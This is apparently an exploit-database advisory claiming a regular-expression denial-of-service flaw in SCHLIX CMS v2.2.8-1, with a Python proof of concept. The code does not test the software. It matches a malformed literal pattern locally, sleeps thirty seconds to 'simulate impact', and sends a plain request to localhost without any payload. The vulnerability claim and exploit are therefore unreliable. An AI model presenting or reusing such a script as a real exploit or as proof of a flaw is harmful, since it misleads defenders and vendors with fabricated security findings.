# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service # Date: 02/10/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://www.schlix.com # Software Link: https://www.schlix.com/html/schlix-cms-downloads.html # Version: v2.2.8-1 # Tested on: Windows 11 + XAMPP ## Description ## SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluat… ## Proof Of Concept ## import requests import re import time def test_redos(url, payload): try: vulnerable_regex = r'(.*a){x} for x > 10' match = re.match(vulnerable_regex, payload) if match: print("Vulnerability not triggered.") else: print("Vulnerability may be present. Simulating 30-second impact...") for _ in range(6): time.sleep(5) print("Simulating impact...") print("Simulated impact duration completed.") except re.error: print("Error in regex pattern.") try: response = requests.get(url) if response.status_code == 200: print("Service is up.") else: print("Service may be down or inaccessible.") except requests.RequestException as e: print(f"HTTP Request Error: {str(e)}") if __name__ == "__main__": target_url = 'http://localhost' payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!" test_redos(target_url, payload)